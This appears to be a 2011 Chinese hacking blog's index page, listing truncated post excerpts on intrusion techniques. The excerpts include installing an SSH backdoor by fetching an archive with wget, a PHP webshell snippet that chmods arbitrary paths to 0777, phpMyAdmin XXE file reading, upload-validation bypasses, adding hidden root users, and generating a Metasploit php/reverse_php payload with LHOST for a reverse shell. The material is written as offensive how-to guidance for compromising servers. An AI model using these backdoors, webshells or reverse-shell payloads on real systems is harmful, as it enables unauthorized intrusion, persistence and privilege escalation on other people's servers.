上一页 1 ··· 11 12 13 14 15 16 17 18 19 ··· 30 下一页

2011年11月30日

突破本地验证继续上传

摘要: 一、前言Web应用程序的编写,在满足其功能的同时却鲜有人关注其安全性,从市场上推出的各类Web应用防火墙不难理解,Web应用程序主要面临哪些安全威胁呢?如Sql注入、网页木马、表单绕过、跨站脚本、Xpath注入、口令爆力破解、客户端伪造请求…等,而其漏洞根源在于开发者完全没有安全意识到而导致的。而本文将和大家讨论本地验证的缺陷,本地验证的最大的优点应该是减轻服务器端的计算负荷,而其带来的安全胁威却足以令服务器沦陷为肉机。二、突破本地验证本地验证的方法,一般是使用javaScript脚本简单验证,比如上传格式的验证,输入内容长度的验证,如果服务器端也不进行二次验证的话,易导致恶意攻击者只需在本地 阅读全文

posted @ 2011-11-30 15:31 =_=! 阅读(670) 评论(0) 推荐(0) 编辑

2011年11月26日

LINUX 安装SSHBD后门

摘要: 老牌的SSH后门了,功能稳定备份原文件:1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old3、下载并安装ssh后门:shell-# wget http://www.down.com/sshbd.tgzshell-# tar zxvf sshbd.tgzshell-# cd openssh4、设置ssh后门的登录密码:vi versio.h#define SSH_VERSION "OpenSSH_4.2" --> you 阅读全文

posted @ 2011-11-26 11:00 =_=! 阅读(819) 评论(0) 推荐(0) 编辑

2011年11月25日

C段渗透攻击必看的技术知识

摘要: 假设想攻击的主机IP是:61.139.1.79 同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆 第一步: tracert 61.139.1.1 C:\WIN2000\system32>tracert 61.139.1.1 Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 30 hops: 1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1] Trace complete. 这就说明了你想攻击的主机和你所在的主机在一个关网中 阅读全文

posted @ 2011-11-25 09:33 =_=! 阅读(1173) 评论(0) 推荐(0) 编辑

2011年11月6日

韩国Ezshop编辑器欺骗上传漏洞

摘要: 漏洞文件: ezshop/editor/demo.php利用图片后门欺骗上传。 上传后路径是:ezshop/editor/uploaded/img/ Or :ezshop/editor/img/ 阅读全文

posted @ 2011-11-06 18:32 =_=! 阅读(275) 评论(0) 推荐(0) 编辑

PhpMyadmin任意文件读取漏洞

摘要: 漏洞详情简要描述:PhpMyadmin实现中错误的使用了simplexml_load_string函数用于xml解析,但是该函数中默认并没有处理好外部实体的安全性,导致用户可以借助xml文件读取和访问应用有权限访问的系统和网络资源详细说明:libraries/import/xml.php中unset($data);/** * Load the XML string * * The option LIBXML_COMPACT is specified because it can * result in increased performance without the need to * al 阅读全文

posted @ 2011-11-06 10:58 =_=! 阅读(2419) 评论(0) 推荐(0) 编辑

2011年11月4日

linux下用webshell对文件权限的修改

摘要: 当我们拥有了一个linux下的shell(服务器上多个网站)。 这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。 那么,这样的主机设置肯定是不安全的。 有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修改,却发现没有权限。 我们可以尝试通过以下脚本来实现对其他站点的文件添加权限。 代码: <?php $path = stripslashes($_GET[&apos;path&apos;]); $ok = chmod ($path , 0777); if ($ok == true) echo " CH 阅读全文

posted @ 2011-11-04 19:39 =_=! 阅读(1215) 评论(0) 推荐(0) 编辑

linux添加root权限用户

摘要: 第一步,添加普通用户创建用户、设置密码、修改用户、删除用户:useradd testuser创建用户testuserpasswd testuser给已创建的用户testuser设置密码说明:新创建的用户会在/home下创建一个用户目录testuserusermod --help修改用户这个命令的相关参数userdel testuser删除用户testuserrm -rf testuser删除用户testuser所在目录上面的几个命令只有root账号才可以使用,如果你不知道自己的系统上面的命令在什么位置可以使用如下命令查找其路径:locate useradd第二步,添加权限编辑/etc/pass 阅读全文

posted @ 2011-11-04 09:55 =_=! 阅读(476) 评论(0) 推荐(0) 编辑

不用root权限去修改不同组用户的文件

摘要: 我的情况是这样的,拿到shell后,id查看权限为apache,id=48,而网站的文件权限为nobody,id=99.cat /etc/passwd按理apache权限比nobody权限高,但是实际情况就是网站文件修改不了。这个时候该怎么办呢? 上传个覆盖?不行!提权?2.6.18-194.32.1.el5 这个内核貌似不好提。想到以前的一个chown.php,试试了 哈哈,果然把该文件的nobody权限改为apache权限了。这下,我就可以修改了。嘿嘿 阅读全文

posted @ 2011-11-04 08:43 =_=! 阅读(394) 评论(0) 推荐(0) 编辑

2011年9月30日

突破防篡改 继续上传

摘要: 继SQL注入盛行,许多网站首页招致恶意的篡改,人们迫切的需要一款解决网页防篡改问题的方案,许多公司相续推出了硬件和软件,比如文中提到的IGuard防篡改系统,防篡改的原理一般基于三种,分别是外挂轮询技术、核心内嵌技术、事件触发技术。外挂轮询技术是利用一个网页检测程序,以轮询方式读出要监控的网页,与真实网页相比较,来判断网页内容的完整性,对于被篡改的网页进行报警和实时恢复。核心内嵌技术是将篡改检测模块嵌在Web服务器软件里,它在每一个网页流出时都进行完整性检查,对于篡改网页进行实时访问阻断,并予以报警和恢复。事件触发技术是利用操作系统的文件系统接口,在网页文件的被修改时进行合法性检查,对于非法操 阅读全文

posted @ 2011-09-30 10:31 =_=! 阅读(388) 评论(0) 推荐(0) 编辑

2011年9月22日

当Linux提权不能反弹Shell时利用metasploit进行提权

摘要: 当LINUX提权反弹不了时.经常遇到这种情况 请出MSF ..1 .生成WEBSHELL文件 msf > msfpayload php/reverse_php LHOST=你的IP LPORT=端口 R > dis9.php 我的BT4是在/ROOT/ 目录 然后吧dis9.php加 才能运行 把dis9.php传进你的SHELL里 例如 www.91ri.org/dis9.php2 . 然后MSF设置接口模板和参数 msf > use multi/handler //进入 multi/handler 接口 msf exploit(handler) > set PAYL 阅读全文

posted @ 2011-09-22 01:56 =_=! 阅读(1080) 评论(0) 推荐(0) 编辑

上一页 1 ··· 11 12 13 14 15 16 17 18 19 ··· 30 下一页

导航